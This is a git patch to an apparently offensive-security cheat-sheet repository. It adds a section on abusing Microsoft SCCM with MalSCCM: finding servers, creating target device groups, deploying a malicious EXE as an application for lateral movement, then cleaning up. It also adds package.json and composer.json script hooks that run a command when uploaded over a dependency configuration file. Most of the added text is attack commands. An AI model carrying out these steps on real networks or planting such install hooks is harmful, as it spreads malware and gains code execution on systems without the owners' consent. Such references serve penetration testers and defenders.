From 67457ec58286fadf978c1c1f93a17e5d2f9a0be8 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 9 May 2022 15:14:26 +0200 Subject: [PATCH] SCCM deployment + JSON uploads --- .../Active Directory Attack.md | 61 ++++++++++++++++++- Upload Insecure Files/README.md | 20 +++++- 2 files changed, 78 insertions(+), 3 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 527b4f8..49ba3a5 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -105,6 +105,7 @@ - [Kerberos Resource Based Constrained Delegation](#kerberos-resource-based-constrained-delegation) - [Kerberos Bronze Bit Attack - CVE-2020-17049](#kerberos-bronze-bit-attack---cve-2020-17049) - [PrivExchange attack](#privexchange-attack) + - [SCCM Deployment](#sccm-deployment) - [RODC - Read Only Domain Controller Compromise](#rodc---read-only-domain-controller-compromise) - [PXE Boot image attack](#pxe-boot-image-attack) - [DSRM Credentials](#dsrm-credentials) @@ -3238,6 +3239,63 @@ python Exchange2domain.py -ah attackterip -ap listenport -u user -p password -d python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th DCip --just-dc-user krbtgt MailServerip ``` +### SCCM Deployment + +> SCCM is a solution from Microsoft to enhance administration in a scalable way across an organisation. + +* [PowerSCCM - PowerShell module to interact with SCCM deployments](https://github.com/PowerShellMafia/PowerSCCM) +* [MalSCCM - Abuse local or remote SCCM servers to deploy malicious applications to hosts they manage](https://github.com/nettitude/MalSCCM) + +* Compromise client, use locate to find management server + ```ps1 + MalSCCM.exe locate + ``` +* Enumerate over WMI as an administrator of the Distribution Point + ```ps1 + MalSCCM.exe inspect /server: /groups + ``` +* Compromise management server, use locate to find primary server +* use Inspect on primary server to view who you can target + ```ps1 + MalSCCM.exe inspect /all + MalSCCM.exe inspect /computers + MalSCCM.exe inspect /primaryusers + MalSCCM.exe inspect /groups + ``` +* Create a new device group for the machines you want to laterally move too + ```ps1 + MalSCCM.exe group /create /groupname:TargetGroup /grouptype:device + MalSCCM.exe inspect /groups + ``` + +* Add your targets into the new group + ```ps1 + MalSCCM.exe group /addhost /groupname:TargetGroup /host:WIN2016-SQL + ``` +* Create an application pointing to a malicious EXE on a world readable share : `SCCMContentLib$` + ```ps1 + MalSCCM.exe app /create /name:demoapp /uncpath:"\\BLORE-SCCM\SCCMContentLib$\localthread.exe" + MalSCCM.exe inspect /applications + ``` + +* Deploy the application to the target group + ```ps1 + MalSCCM.exe app /deploy /name:demoapp /groupname:TargetGroup /assignmentname:demodeployment + MalSCCM.exe inspect /deployments + ``` +* Force the target group to checkin for updates + ```ps1 + MalSCCM.exe checkin /groupname:TargetGroup + ``` + +* Cleanup the application, deployment and group + ```ps1 + MalSCCM.exe app /cleanup /name:demoapp + MalSCCM.exe group /delete /groupname:TargetGroup + ``` + + + ### RODC - Read Only Domain Controller Compromise > If the user is included in the **Allowed RODC Password Replication**, their credentials are stored in the server, and the **msDS-RevealedList** attribute of the RODC is populated with the username. @@ -3585,4 +3643,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [The Kerberos Key List Attack: The return of the Read Only Domain Controllers - Leandro Cuozzo](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/) * [AD CS: weaponizing the ESC7 attack - Kurosh Dabbagh - 26 January, 2022](https://www.blackarrow.net/adcs-weaponizing-esc7-attack/) * [AD CS: from ManageCA to RCE - 11 February, 2022 - Pablo Martínez, Kurosh Dabbagh](https://www.blackarrow.net/ad-cs-from-manageca-to-rce/) -* [Introducing the Golden GMSA Attack - YUVAL GORDON - March 01, 2022](https://www.semperis.com/blog/golden-gmsa-attack/) \ No newline at end of file +* [Introducing the Golden GMSA Attack - YUVAL GORDON - March 01, 2022](https://www.semperis.com/blog/golden-gmsa-attack/) +* [Introducing MalSCCM - Phil Keeble -May 4, 2022](https://labs.nettitude.com/blog/introducing-malsccm/) diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index 3e89611..54b30cb 100644 --- a/Upload Insecure Files/README.md +++ b/Upload Insecure Files/README.md @@ -96,8 +96,9 @@ Valid pictures hosting PHP code. Upload the picture and use a local file inclusi ### Configuration Files -If you are trying to upload files to a PHP server, take a look at the .htaccess trick to execute code. -If you are trying to upload files to an ASP server, take a look at the .config trick to execute code. +If you are trying to upload files to a : +- PHP server, take a look at the .htaccess trick to execute code. +- ASP server, take a look at the .config trick to execute code. Configuration files examples - .htaccess @@ -105,6 +106,21 @@ Configuration files examples - httpd.conf - \_\_init\_\_.py +Alternatively you may be able to upload a JSON file with a custom scripts, try to overwrite a dependency manager configuration file. +- package.json + ```js + "scripts": { + "prepare" : "/bin/touch /tmp/pwned.txt" + } + ``` +- composer.json + ```js + "scripts": { + "pre-command-run" : [ + "/bin/touch /tmp/pwned.txt" + ] + } + ``` ### CVE - Image Tragik